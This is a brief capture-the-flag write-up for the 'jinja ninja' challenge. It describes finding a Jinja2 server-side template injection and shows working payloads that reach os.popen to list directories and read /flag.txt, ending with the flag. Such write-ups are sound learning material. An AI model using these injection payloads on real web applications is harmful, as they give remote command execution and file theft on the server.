Skip to main content

jinja ninja

Solved by: ndrasukagacoan & Hanxoe

WTF is a JINJA? Aint it supposed to be NINJA RAHHHHHHHH

10.4.79.68:20003

author: anarchistx

Accessing the URL gives us:

home

The name of the chall has jinja, so it could be a hint to Jinja2. Hmm, I wonder if it's SSTI (Server-Side Template Injection). Let's try...

ssti test

Oh yeah!! Let's try executing a shell command:

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen("ls").read() }}

ssti test 2

Nice... now where's the flag? Hmm...

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen("ls /").read() }}

ssti test 3

Oh yeah baby.

{{self._TemplateReference__context.cycler.__init__.__globals__.os.popen("cat /flag.txt").read() }}

ssti final

FLAG: compit{j1nj4_1nj3ct10n_15_d4ng3r0u5_4nd_fun}